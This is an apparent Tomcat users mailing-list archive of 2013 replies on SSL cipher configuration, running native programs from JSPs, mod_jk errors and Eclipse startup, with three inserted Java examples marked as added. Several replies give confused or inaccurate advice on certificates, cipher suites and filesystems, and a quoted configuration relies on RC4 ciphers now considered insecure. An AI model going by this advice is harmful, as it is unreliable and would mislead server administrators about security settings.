2. If I do the above does calling the service.bat install again using the *newer* service.bat version make a difference? We are calling it (the newer service.bat) and it seems to be harmless and thought that it might help in case something in the batch install changed, we would get the changes.

Bottom line, has anyone faced this dilemma and found a successful way to upgrade a tomcat instance that uses a unique service login.

Thanks for any input.
Pat
RE: SSL Best Practices
Jeff

do you have keystore and certificate..if not go to verisign and get a CATrusted pfx... the cost is worth it and anything you create with a self-signed cert will be broken in less than 5 min

Feel free to Pingback if you have any questions.
Martin

From: jeffrey.jan...@polydyne.com
To: users@tomcat.apache.org
Subject: RE: SSL Best Practices
Date: Mon, 18 Mar 2013 13:34:44 +

-Original Message-
From: Jeffrey D. Fisher [mailto:jeff.fisher12...@cox.net]
Sent: Friday, March 15, 2013 3:03 PM
To: users@tomcat.apache.org
Subject: SSL Best Practices

Gentlemen (Ladies):

I am looking for a published best practice on editing the SERVER.XML configuration file to use SSL/HTTPS. The keys are imported into the keystore. Any input is appreciated.

Jeff Fisher
Omaha, NE

I would start by reading the Tomcat Documentation on the subject. It's pretty straightforward.

Jeff
RE: Getting HttpSession from HandshakeRequest/Configurator
Nick

if you don't mind Comet's implementation of WebSocket events to Servlet-3.0 POST and GET then check out
http://java.dzone.com/articles/tomcat-websockets-html5
I'll let you test drive to see if Ant's WebSocketServlet fully supports all aspects of the WebSocket spec
http://en.wikipedia.org/wiki/WebSocket

Keep us apprised, Happy Driving
Martin
__
Place Long-winded disclaimer here

From: nicho...@nicholaswilliams.net
Subject: Getting HttpSession from HandshakeRequest/Configurator
Date: Sun, 17 Mar 2013 17:56:23 -0500
To: users@tomcat.apache.org

Based on my reading of the WebSocket spec mailing lists and API documentation, if I want to get the HttpSession that exists when a WebSocket connection is negotiated I need to extend ServerEndpointConfig.Configurator, override #modifyHandshake(), and call #getHttpSession() on the HandshakeRequest. However, I need a little clarification, because I'm not seeing how this is going to work:

1) Tomcat doesn't implement HandshakeRequest ... anywhere. So I'm not even seeing how that method could ever be called with a non-null argument. (Admittedly, I haven't run this yet ... I'm sending this preemptively while I complete my code, to go ahead and get some feedback).

2) None of the arguments to #modifyHandshake() provide access to the Session. So how am I supposed to do anything with it? How can I associate the HttpSession with the Session?
RE: Running a binary program from a JSP
Hi Dan

Earlier I gave him an example of a DWR backend bean which handles the mechanics of Runtime.getRuntime().exec("cmd.exe /C 'fubar'");
I *was* going to suggest using An Applet but I didn't want to spend the rest of the month twiddling the exact permutation of execute and read permissions

Thanks for the link!
Martin Gainty

Subject: Re: Running a binary program from a JSP
From: dmik...@vmware.com
Date: Thu, 14 Mar 2013 08:06:06 -0400
To: users@tomcat.apache.org

On Mar 14, 2013, at 12:34 AM, Tim Gross wrote:

Hi, I want to know if it is possible to execute a binary program (written in C) from within a JSP.

Yes.

I would like to do this on the server side, not the browser, in Tomcat6. If it is possible, can somebody provide an example.

Use...
http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
or
http://docs.oracle.com/javase/6/docs/api/java/lang/ProcessBuilder.html
Google can give you examples.

Dan

Sorry if I am using the wrong mailing list. Feel free to redirect me if that is the case.

Thanks, Tim.
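The thread above points to Runtime and ProcessBuilder for starting a native program from server-side code. As an added example (not code from the thread), the Java 8+ class below shows one way to do that from a servlet or a bean behind a JSP without handing request data to a command interpreter; the tool path, its --id option and the argument allowlist are assumptions, and a Unix-like host is assumed.

```java
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.List;
import java.util.concurrent.TimeUnit;
import java.util.regex.Pattern;

/** Runs one fixed native program on behalf of a servlet or JSP, without a shell. */
public class NativeToolRunner {

    // Hypothetical install path of the C program; set by the deployer, never by the request.
    static final String TOOL = "/opt/app/bin/report";
    // Allowlist for the one request-derived argument (assumed to be a short identifier).
    static final Pattern SAFE_ARG = Pattern.compile("[A-Za-z0-9_-]{1,32}");
    static final int MAX_OUTPUT_BYTES = 64 * 1024;
    static final long TIMEOUT_SECONDS = 10;

    /**
     * Builds the argv list. Each element reaches the program as exactly one
     * argument, so spaces, quotes, ';' or '&' are never interpreted. Contrast with
     * Runtime.getRuntime().exec("cmd.exe /C " + userInput), where the command
     * interpreter parses the request data.
     */
    static List<String> buildCommand(String tool, String userArg) {
        if (userArg == null || !SAFE_ARG.matcher(userArg).matches()) {
            throw new IllegalArgumentException("argument rejected by allowlist");
        }
        return Arrays.asList(tool, "--id", userArg);   // "--id" is a made-up option
    }

    /** Starts the command, waits at most TIMEOUT_SECONDS, returns its capped output. */
    static String run(List<String> command) throws IOException, InterruptedException {
        File out = File.createTempFile("tool-", ".out");
        try {
            ProcessBuilder pb = new ProcessBuilder(command);
            pb.environment().clear();        // child does not inherit Tomcat's environment
            pb.redirectErrorStream(true);    // stderr goes to the same file as stdout
            pb.redirectOutput(out);          // a file cannot fill up and block the child
            Process p = pb.start();
            p.getOutputStream().close();     // child sees EOF on stdin
            if (!p.waitFor(TIMEOUT_SECONDS, TimeUnit.SECONDS)) {
                p.destroyForcibly();         // do not leave a hung child behind
                throw new IOException("tool timed out after " + TIMEOUT_SECONDS + "s");
            }
            if (p.exitValue() != 0) {
                throw new IOException("tool exited with status " + p.exitValue());
            }
            return readCapped(out);
        } finally {
            out.delete();
        }
    }

    /** Reads back at most MAX_OUTPUT_BYTES of the captured output. */
    static String readCapped(File f) throws IOException {
        try (InputStream in = new FileInputStream(f)) {
            byte[] buf = new byte[MAX_OUTPUT_BYTES];
            int n = 0;
            int r;
            while (n < buf.length && (r = in.read(buf, n, buf.length - n)) > 0) {
                n += r;
            }
            return new String(buf, 0, n, StandardCharsets.UTF_8);
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: one identifier that passes, one string that does not.
        System.out.println(buildCommand(TOOL, "order-42"));
        try {
            buildCommand(TOOL, "42; ls");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        if (new File(TOOL).canExecute()) {   // only runs where the placeholder tool exists
            System.out.println(run(buildCommand(TOOL, "order-42")));
        }
    }
}
```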
RE: Compiling JSPs at runtime
Zimmer

http://www.jarfinder.com/index.php/jars/versionInfo/4589

Good luck,
Martin

Date: Sat, 9 Mar 2013 14:39:23 +0100
Subject: Compiling JSPs at runtime
From: fb666fb...@gmail.com
To: users@tomcat.apache.org

Hello!

I'm working on a WCMS system where I want to compile some view components at runtime. I found the Jasper howto to compile using Ant, but that's not what I need. I have dynamic JSP code stored in a database. Simplified I want to do something like this:

    protected void doRequest(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        int templateId = Integer.parseInt(request.getParameter("templateId"));
        String jspCode = db.queryString("select jspCode from templates where id = " + templateId);
        Jasper jspc = new Jasper();
        Servlet jspServlet = jspc.compile(jspCode);
        forward(jspServlet);
    }

For sure this is very simplified. I know that the Jasper JSPC will need much more configuration/environment set. Can someone point me to the right classes to start?

Thanks,
Gerd
RE: Tomcat does not accept connections from Safari on iPad vs an SSL connector with JSSE ciphers
someone put cipherSuites patch on TC 7 Connector..
*IF you are implementing TC7 Connector with cipherSuites attribute support and have not specified cipherSuites supported by your ppk keys* then yes it's Tomcat's fault
Otherwise it's not..

Ciao,
Martin Gainty

Date: Fri, 15 Feb 2013 12:36:53 -0500
From: ch...@christopherschultz.net
To: users@tomcat.apache.org
Subject: Re: Tomcat does not accept connections from Safari on iPad vs an SSL connector with JSSE ciphers

Giuseppe,

On 2/15/13 9:07 AM, Giuseppe Sacco wrote:

Debugging the SSL handshake, I found that the problem is really about ciphers because the handshake fails with exception javax.net.ssl.SSLHandshakeException: no cipher suites in common

So, this is really something to be investigated in JSSE instead of tomcat. I am sorry for noise in this list :-(

We were pretty sure it wasn't Tomcat's fault, but we can still probably help.

Allow legacy hello messages: true
[snip]
http-192.168.1.55-8443-1, READ: SSLv3 Handshake, length = 75
*** ClientHello, SSLv3
RandomCookie: GMT: 1360933724 bytes = { 203, 86, 168, 88, 75, 77, 52, 134, 4, 76, 204, 78, 0, 160, 168, 123, 96, 78, 106, 23, 40, 47, 219, 81, 28, 23, 174, 156 }
Session ID: {}
Cipher Suites: [TLS_EMPTY_RENEGOTIATION_INFO_SCSV, Unknown 0x0:0x3d, Unknown 0x0:0x3c, TLS_RSA_WITH_AES_128_CBC_SHA, SSL_RSA_WITH_RC4_128_SHA, SSL_RSA_WITH_RC4_128_MD5, TLS_RSA_WITH_AES_256_CBC_SHA, SSL_RSA_WITH_3DES_EDE_CBC_SHA, Unknown 0x0:0x67, Unknown 0x0:0x6b, TLS_DHE_RSA_WITH_AES_128_CBC_SHA, TLS_DHE_RSA_WITH_AES_256_CBC_SHA, SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA, Unknown 0x0:0x3b, SSL_RSA_WITH_NULL_SHA, SSL_RSA_WITH_NULL_MD5]
Compression Methods: { 0 }
***

So the client is doing an SSLv3 handshake. The message above about allowing legacy hellos seems like it should support a SSLv3 handshake.

Looking at the ciphers, your JVM (without BouncyCastle) and client truly have no overlap. I'm actually surprised that your JVM does not support any TLS_RSA_* or TLS_DHE_* ciphers. Can you re-run my cipher-dump program without BouncyCastle and provide the full output? I was a little unclear as to what you posted last time.

-chris
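The diagnosis above rests on comparing the suites in the ClientHello with the suites the server JVM offers. As an added example (not the cipher-dump program mentioned in the thread), the Java class below intersects the named suites from the quoted ClientHello with what the running JVM's default JSSE context supports and enables; the class and method names are placeholders.

```java
import java.security.NoSuchAlgorithmException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Set;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLParameters;

/** Compares a client's offered cipher suites with those of this JVM's default JSSE context. */
public class CipherOverlap {

    // Named suites copied from the ClientHello quoted in the thread. The
    // "Unknown 0x0:0x.." entries are left out: that JVM had no name for them.
    static final List<String> CLIENT_OFFER = Arrays.asList(
        "TLS_EMPTY_RENEGOTIATION_INFO_SCSV",
        "TLS_RSA_WITH_AES_128_CBC_SHA",
        "SSL_RSA_WITH_RC4_128_SHA",
        "SSL_RSA_WITH_RC4_128_MD5",
        "TLS_RSA_WITH_AES_256_CBC_SHA",
        "SSL_RSA_WITH_3DES_EDE_CBC_SHA",
        "TLS_DHE_RSA_WITH_AES_128_CBC_SHA",
        "TLS_DHE_RSA_WITH_AES_256_CBC_SHA",
        "SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA",
        "SSL_RSA_WITH_NULL_SHA",
        "SSL_RSA_WITH_NULL_MD5");

    /** Suites present in both lists, kept in the client's preference order. */
    static List<String> overlap(List<String> offered, String[] serverSuites) {
        Set<String> server = new LinkedHashSet<String>(Arrays.asList(serverSuites));
        List<String> common = new ArrayList<String>();
        for (String suite : offered) {
            // The SCSV entry is a renegotiation signal, not a negotiable suite.
            if (suite.endsWith("_SCSV")) continue;
            if (server.contains(suite)) common.add(suite);
        }
        return common;
    }

    /** True for suites with no encryption, no authentication, export keys, RC4 or MD5. */
    static boolean isWeak(String suite) {
        return suite.contains("_NULL_") || suite.contains("_anon_")
            || suite.contains("_EXPORT_") || suite.contains("_RC4_")
            || suite.endsWith("_MD5");
    }

    static void report(String label, List<String> common) {
        System.out.println("Shared with client, " + label + ": " + common.size());
        for (String suite : common) {
            System.out.println("  " + suite + (isWeak(suite) ? "   [weak, keep disabled]" : ""));
        }
        if (common.isEmpty()) {
            System.out.println("  none: the handshake fails with 'no cipher suites in common'");
        }
    }

    public static void main(String[] args) throws NoSuchAlgorithmException {
        SSLContext ctx = SSLContext.getDefault();
        SSLParameters supported = ctx.getSupportedSSLParameters();
        SSLParameters enabled = ctx.getDefaultSSLParameters();

        System.out.println("java.version = " + System.getProperty("java.version"));
        report("supported by this JVM", overlap(CLIENT_OFFER, supported.getCipherSuites()));
        report("enabled by default", overlap(CLIENT_OFFER, enabled.getCipherSuites()));
    }
}
```

A shared suite name is necessary but not sufficient: the connector's keystore must also hold a key of the type the suite authenticates with (RSA for every suite in this list).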
RE: mod_jk errors errno=110 and errno=115
Phillipe

ajp_send_request::jk_ajp_common.c (1630): (nodeYY) connecting to backend failed. Tomcat is probably not started or is listening on the wrong port (errno=115)

indicate that you might have a misconfig on jk.properties
...check out host and port attributes here
http://tomcat.apache.org/connectors-doc/reference/workers.html

Good luck,
Martin

Date: Thu, 14 Feb 2013 14:17:10 +0100
Subject: mod_jk errors errno=110 and errno=115
From: pbo...@gmail.com
To: users@tomcat.apache.org

Hello,

We have a mod_jk in version 1.2.28 with Apache 2.16 fronting a Tomcat server in version 6 on JDK6. We are facing long response times and timeouts from time to time. Mod_jk log files show the following errors:

[][X] [error] ajp_connect_to_endpoint::jk_ajp_common.c (1035): (nodeXX) cping/cpong after connecting to the backend server failed (errno=110)
[][X] [error] ajp_send_request::jk_ajp_common.c (1630): (nodeXX) connecting to backend failed. Tomcat is probably not started or is listening on the wrong port (errno=110)
[][X] [error] ajp_connect_to_endpoint::jk_ajp_common.c (1035): (nodeXX) cping/cpong after connecting to the backend server failed (errno=110)
[][X] [error] ajp_send_request::jk_ajp_common.c (1630): (nodeXX) connecting to backend failed. Tomcat is probably not started or is listening on the wrong port (errno=110)
[][X] [error] ajp_service::jk_ajp_common.c (2626): (nodeXX) connecting to tomcat failed.
[][X] [error] ajp_send_request::jk_ajp_common.c (1630): (nodeYY) connecting to backend failed. Tomcat is probably not started or is listening on the wrong port (errno=115)
[][X] ] [error] ajp_send_request::jk_ajp_common.c (1630): (nodeYY) connecting to backend failed. Tomcat is probably not started or is listening on the wrong port (errno=115)
[][X] [error] ajp_service::jk_ajp_common.c (2626): (nodeYY) connecting to tomcat failed.

What could be the explanations except for Tomcat Thread pool not having threads available anymore? Thing we checked.

Were there fixes in new mod_jk versions (1.2.37) regarding issues like these?

Thanks for your help
RE: Problem
eclipse is an enormous resource hog.. I've seen eclipse crash when someone opens vi after eclipse is running so the problem is not tomcat but your Tomcat (sysdeo? plugin)

which version Tomcat (sysdeo?) plugin are you running?

Martin

From: vinit1...@live.in
To: users@tomcat.apache.org
Subject: RE: Problem
Date: Mon, 21 Jan 2013 10:50:36 +0530

I have run the TC in standalone mode...and it is running .. but when running thru eclipse juno ...it is showing the message -

Server Tomcat v7.0 Server at localhost was unable to start within 45 seconds. If the server requires more time, try increasing the timeout in the server editor.

I have reinstalled the plugin and increased the start timeout...it makes no change.

thanks

From: mgai...@hotmail.com
To: users@tomcat.apache.org
Subject: RE: Problem
Date: Sat, 19 Jan 2013 08:40:09 -0500

what does the TC log say.. have you run TC standalone

$CATALINA_HOME\bin\catalina start

if TC runs standalone but not thru eclipse then you have 2 possible problems:
1) possible Mis-configured TC eclipse plugin
2) There is a problem with TC eclipse plugin itself..probably
2a) possible version mismatch between TC plugin and child dependencies
2b) possible resource allocation issue..socket bound..not enough PermGen space etc

pingback with your findings
Martin

From: vinit1...@live.in
To: users@tomcat.apache.org
Subject: Problem
Date: Sat, 19 Jan 2013 13:22:17 +0530

Hi all, I am having a problem in starting the apache tomcat server version 7.0.31 through eclipse. It is showing the message that server taking time to start the server, so increase the start time limit, after configuring this I am not able to rectify this problem.

thanks
RE: session not working when dash or underscore in application name
There are a number of TC variables that are acquired from the FileSystem during webapp initialisation.. unfortunately when File systems assign folder name they vary widely in their treatment of 'special characters' in filenames

as a test ..install Tomcat to Tomcat off of root folder then place webapps off of Tomcat then install one webapp heads-or-tails so in your mind your filesystem *should* look like

/Tomcat/webapps/heads-or-tails

But NTFS File System creates an 8 character filename that it assigns as directory folder so instead of heads-or-tails folder you'll get

/Tomcat/webapps/HEADS-~1

Not inserting spaces, dashes (or anything besides a-z,0-9,A-Z) into folder-name is always a safe deployment strategy

Bon Chance,
Martin Gainty

Date: Sun, 20 Jan 2013 10:51:10 +0100
From: benintechnolog...@yahoo.fr
To: users@tomcat.apache.org
Subject: Re: session not working when dash or underscore in application name

Thanks, maybe the problem has been solved in 7.0.34, I'll try that version later. In the meantime I simply removed all dashes and underscores, and everything works fine.

On 19/01/2013 20:52, Christopher Schultz wrote:

To whom it may concern,

On 1/19/13 7:15 AM, Benin Technologies wrote:

I just installed Tomcat 7.0.32 on Debian Linux 6 (Squeeze). Client is Mozilla Firefox 12.0, also on Debian Linux 6.

To test session behavior, I did a simple JSP page that simulates a coin launch (heads or tails), and displays the total of heads and total of tails.

If my war file is called headsOrTails.war, it works just fine :
http://tomcat:8080/headsOrTails/

but if there are dashes or underscores in the name, Tomcat creates a new session for each page request (so I can't get the totals)
http://tomcat:8080/heads-or-tails/
http://tomcat:8080/heads_or_tails/

is this a normal behavior ?

I do not experience the behavior you describe on 7.0.34. Neither dashes nor underscores anywhere in the path of the JSP seem to have that effect: a single session is created when I try it.

Perhaps something else is affecting your environment?

-chris
RE: Problem
what does the TC log say.. have you run TC standalone

$CATALINA_HOME\bin\catalina start

if TC runs standalone but not thru eclipse then you have 2 possible problems:
1) possible Mis-configured TC eclipse plugin
2) There is a problem with TC eclipse plugin itself..probably
2a) possible version mismatch between TC plugin and child dependencies
2b) possible resource allocation issue..socket bound..not enough PermGen space etc

pingback with your findings
Martin

From: vinit1...@live.in
To: users@tomcat.apache.org
Subject: Problem
Date: Sat, 19 Jan 2013 13:22:17 +0530

Hi all,I am having a problem in starting the apache tomcat server version 7.0.31 through eclipse.It is showing the message that server taking time to start the server,so increase the start time limit,after configuring this i am not able to rectify this problem.

thanks
RE: Restricting ciphers
1. The ciphers parameter in Connector determines the enabled cipher suites in the SSLSocket. See SSLSocket.setEnabledCipherSuites(). That in turn restricts which actual cipher suite can be negotiated with the client, depending also on the client's cipher suites and how JSSE chooses among those that intersect.

MG: understood

2. The private key itself doesn't have any 'supported ciphers' so your question is already meaningless. However (a) it does have a *type*, which is generally RSA or else DH, and (b) it corresponds to a single X.509 certificate which contains a public key in the same type or format.

MG: yes the public key would implement RSA or DH or Idea or some other *type*

If the server requests a client certificate, it (i.e. JSSE, not Tomcat) sends an SSL CertificateRequest message, which contains a list of acceptable certificate types and a list of acceptable signers.

MG: thus the choice for cipher suites is now assigned
MG: reprising the publicKey signer algorithm to cipher suite
MG: With a RSA (public) key you can nominally use the RSA and DHE_RSA cipher suite. But if the server certificate has a Key Usage extension which does not include the keyEncipherment flag, then you are nominally limited to DHE_RSA.
MG: With a DSA (public) key you can use only a DHE_DSS cipher suite.
MG: With a Diffie-Hellman (public) key, you can use only one of DH_RSA or DH_DSS, depending on the issuing certificate authority key type.

If the client certificate isn't one of those types or isn't signed by one of those signers it isn't sent

MG: the choice is made!

and if the Web resource being requested is defined as requiring SSL client authentication, Tomcat would then deny access.

MG: let's look at the guts of a public key to clarify what's going on
MG: keytool -list -v -keystore NotForOutsideUse.jks

Keystore type: JKS
Keystore provider: SUN
Your keystore contains 1 entry
Alias name: Alias
Creation date: Apr 24, 2012
Entry type: PrivateKeyEntry
Certificate chain length: 1
Certificate[1]:
Owner: UID=99, EMAILADDRESS=paynom...@paynomind.com, CN=BigBank, OU=, O=BigBank.com
Issuer: UID=IssuingAuthority, CN=CanonicalName, OU=IT Security, O=CanonicalName
Serial number:
Valid from: Tue Apr 24 12:21:00 EDT 2012 until: Fri Apr 24 12:21:00 EDT 2015
Certificate fingerprints:
MD5:
SHA1:
Signature algorithm name: SHA1withRSA
Version: 3
/snip

let's look at the log produced by TC when Public key =NotForOutsideUse.jks request is made in the JSSE Key Exchange

keyStore is : NotForOutsideUse.jks
keyStore type is : jks
init keymanager of type SunX509
found key for : {Omitted}
chain [0] = [ [
Version: V3
Subject: UID=99, CN=CanonicalName ID: 99, OU=, O=paynomind.com
Signature Algorithm: SHA1withRSA
Key: Sun RSA public key, 2048 bits
modulus: Omitted
public exponent: 9
Validity: [From: Fri Dec 10 11:29:21 EST 2010, To: Mon Dec 09 11:29:21 EST 2013]
Issuer: UID=PayNoMind, CN=CanonicalName, OU=Dept1, O=PayNoMind
SerialNumber: [ Omitted ]

EXAMPLE CONCLUSION: the JSSE Key exchange is implementing SSLV3 Protocol AND RSA Signing Algo from the eligible ciphers listed here
http://www.openssl.org/docs/apps/ciphers.html

could the server implement IDEA-CBC-SHA cipher (if listed in Tomcat Connector ciphers=IDEA-CBC-SHA ...

My understanding is there can be NO handshake as there is a mismatch BETWEEN Signing Algo already in use (RSA) with the Signing Algorithm identified by the cipher (IDEA) from the ciphers parameter

is this not the case?

Connection between (1) and (2): zero.

MG: agreed

EJP

-Original Message-
From: Martin Gainty [mailto:mgai...@hotmail.com]
Sent: Friday, 11 January 2013 2:35 PM
To: Tomcat Users List
Subject: RE: Restricting ciphers

it's a simple question

what does ciphers parameter in Connector have anything to do with the supported ciphers from the key itself

the 2 are disconnected

please don't waste my time and anyone else's with insults when you are unable to answer this simple question

Martin Gainty
___
When Free Speech and Discovery are replaced by Confusion and Obfuscation its time to move

Date: Thu, 10 Jan 2013 18:25:02 -0500
From: ch...@christopherschultz.net
To: users@tomcat.apache.org
Subject: Re: Restricting ciphers

Martin,

Honestly, I'm not sure why I'm feeding the troll at this point. Maybe I'm trying to atone for some horrible crime I can't remember.

On 1/10/13 10:05 AM, Martin Gainty wrote:

terminology :

Nobody was arguing about terminology. Next time, just refer to Wikipedia like everyone else.

All you don't know is whether those certificate private key are RSA or DSA algorithms

It doesn't matter: you can use RSA (like everyone does) or DSA and that will only determine the type
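
Added example (not part of any message in this thread, and not Tomcat's or JSSE's own code): a Java check of the two points made above, that the Connector's ciphers value ends up in SSLSocket.setEnabledCipherSuites() and so must use names the JVM knows, and that the certificate key type limits which suites can be used. The class name, the sample ciphers value (taken from the Connector configuration quoted in this thread) and the RSA key type are assumptions; the name-to-key-type mapping is a heuristic on standard suite names.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Set;
import javax.net.ssl.SSLContext;

public class ConnectorCipherCheck {

    // Split a Connector "ciphers" attribute value on commas.
    static List<String> parse(String attribute) {
        List<String> names = new ArrayList<>();
        for (String part : attribute.split(",")) {
            if (!part.trim().isEmpty()) names.add(part.trim());
        }
        return names;
    }

    // Certificate key type a suite needs, read from its standard name:
    // RSA, DHE_RSA, ECDHE_RSA -> RSA key; DHE_DSS -> DSA key;
    // ECDHE_ECDSA -> EC key; static DH_* / ECDH_* -> DH / EC key.
    // Returns null when the name implies none (anonymous, TLS 1.3, unknown).
    static String requiredKeyType(String suite) {
        int start = suite.indexOf('_');
        int with = suite.indexOf("_WITH_");
        if (start < 0 || with <= start) return null;
        String kx = suite.substring(start + 1, with).replace("_EXPORT", "");
        if (kx.endsWith("anon")) return null;
        if (kx.startsWith("DH_")) return "DH";
        if (kx.startsWith("ECDH_")) return "EC";
        if (kx.endsWith("RSA")) return "RSA";
        if (kx.endsWith("DSS")) return "DSA";
        if (kx.endsWith("ECDSA")) return "EC";
        return null;
    }

    public static void main(String[] args) throws Exception {
        // Sample input: the ciphers value and RSA key from this thread
        // (assumptions; pass your own values as arguments).
        String configured = args.length > 0 ? args[0]
                : "TLS_RSA_WITH_RC4_128_SHA, TLS_RSA_WITH_RC4_128_MD5, SSL_CK_RC4_128_WITH_MD5";
        String keyType = args.length > 1 ? args[1] : "RSA";
        // Suite names the default JSSE provider of this JVM implements.
        Set<String> supported = new LinkedHashSet<>(Arrays.asList(
                SSLContext.getDefault().getSupportedSSLParameters().getCipherSuites()));
        int usable = 0;
        for (String name : parse(configured)) {
            String needs = requiredKeyType(name);
            if (!supported.contains(name)) {
                System.out.println(name + ": not a suite name this JVM supports");
            } else if (needs != null && !needs.equals(keyType)) {
                System.out.println(name + ": supported, but needs a " + needs + " key");
            } else {
                System.out.println(name + ": usable with a " + keyType + " key");
                usable++;
            }
        }
        if (usable == 0) {
            System.out.println("No configured suite is usable: handshakes will fail.");
        }
    }
}
```

Run it with the same JVM that runs Tomcat, since the supported set differs between JVM versions and providers. RC4 suites were later prohibited for TLS by RFC 7465, so the sample value is only there to reproduce the naming problem discussed in the thread.
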
RE: Restricting ciphers
terminology :

the X509 standard defines certificates, and RSA and DSA are two of the public key algorithms that can be used in those certificates; certificates are used to hold public keys, and never private keys.

PKCS#12 is a standard for a container which holds an X509 client certificates and private keys

So, if you're examining a PKCS#12 file (typically .p12 extension or a .pfx extension), then you already know: It contains at least one X509 client certificate and corresponding private keys.

All you don't know is whether those certificate private key are RSA or DSA algorithms

You can check this by extracting the certificate(s), and then examine them:

openssl pkcs12 -in mycert.p12 -clcerts -nokeys -out mycert.crt
openssl x509 -in mycert.crt -text

The text output of the openssl x509 command should include a Subject Public Key section, which will include fields that let you see if it's an RSA or DSA key (along with the key size).
http://stackoverflow.com/questions/1722181/determine-certificate-type

PublicKey Generation:
to generate a public-key from PKCS12 privateKeyAndX509Cert use openssl

openssl pkcs12 -in myFile.p12 -out myPublicKey.pem -clcerts -nokeys

https://ca.cern.ch/ca/Help/?kbid=023010

KeyAlgorithms:
KeyAlgorithms are categorised to their cipher-groups: symmetric ciphers, public-key ciphers, and one-way hashing

to list available ciphers within AES algorithm use openssl e.g.

openssl ciphers -v 'AES+HIGH'

cipherGroup is categorised by keysize within cipher-groups (usually a 4 digit number which is a power of 2 e.g. 1024 and 2048)
http://www.gnupg.org/gph/en/manual.html#AEN185

each permutation of cipherGroup-KeySize is further categorised according to implemented ModeOfOperation
http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation

ECB, CBC and PCBC are the usual choices for the optional ModeOfOperation parameter

Determining the ALGO-CIPHER supported by your key

so we can see that public keys contain an algorithm-cipher combination but how to determine the algo-cipher supported by your key:

keytool -list -v -keystore fubar.pfx -storetype PKCS12

Here is output:

Certificate fingerprints:
MD5:
SHA1:
Signature algorithm name: SHA1withRSA

Providers (SUN, SunJCE, SunJSSE, SunRsaSign, IBMJSSE, bcprov-jdkNN-MMM)

Let's stick with SunJSSE as our provider

supported ciphers will be those ciphers which match SHA1 with RSA from this list:
http://docs.oracle.com/javase/1.5.0/docs/guide/security/jsse/JSSERefGuide.html

so what you are asking Tomcat Connector to do is
1) export contents of supplied keystoreFile key of keystoreType PKCS12
2) determine Signature algorithm name
3) aggregate cipherSuite by determining Signature specific supported ciphers from Signature algorithm name from http://docs.oracle.com/javase/1.5.0/docs/guide/security/jsse/JSSERefGuide.html
4) reference ciphers attribute from Tomcat Connector
5) determine SignatureSpecificSupportedCiphers from 3) and implement ONLY those ciphers which match exactly to the ciphers listed in Tomcat Connector
5) (I have not seen this currently implemented)

Martin
__
do not alter or disrupt this transmission

Date: Thu, 10 Jan 2013 11:44:49 +0400
Subject: Re: Restricting ciphers
From: knst.koli...@gmail.com
To: users@tomcat.apache.org

2013/1/10 Baron Fujimoto ba...@hawaii.edu:

On Wed, Jan 09, 2013 at 01:08:01PM +0400, Konstantin Kolinko wrote:

2013/1/9 Baron Fujimoto ba...@hawaii.edu:

I'm attempting to mitigate BEAST (CVE-2011-3389) attacks on Tomcat 6.0.35. My understanding is that the attack applies only to CBC ciphers, and that RC4 ciphers are not vulnerable, so I am attempting to restrict the set of ciphers that Tomcat uses with the following config for a connector:

<Connector protocol="HTTP/1.1" SSLEnabled="true" address="0.0.0.0" port="8443" maxThreads="150" scheme="https" secure="true" keystoreFile="/path/to/keystore" keystoreType="pkcs12" ciphers="TLS_RSA_WITH_RC4_128_SHA, TLS_RSA_WITH_RC4_128_MD5, SSL_CK_RC4_128_WITH_MD5" clientAuth="false" sslProtocol="TLS" />

(...)

As can be seen from your usage of keystoreType attribute, you are using Java implementation of the Connector, not openssl/APR one.

You should look into Java documentation for their cipher names. See this thread from October 2009:
http://markmail.org/message/zn4namfhypyxum23

Ahh, that was it! It did not occur to me that OpenSSL and Java might name the ciphers differently. If I restrict the ciphers to those from the (differently named) set used by Java, it works as expected. Mahalo!

ciphers=SSL_RSA_WITH_RC4_128_MD5, SSL_RSA_WITH_RC4_128_SHA, TLS_ECDHE_ECDSA_WITH_RC4_128_SHA, TLS_ECDHE_RSA_WITH_RC4_128_SHA, TLS_ECDH_ECDSA_WITH_RC4_128_SHA,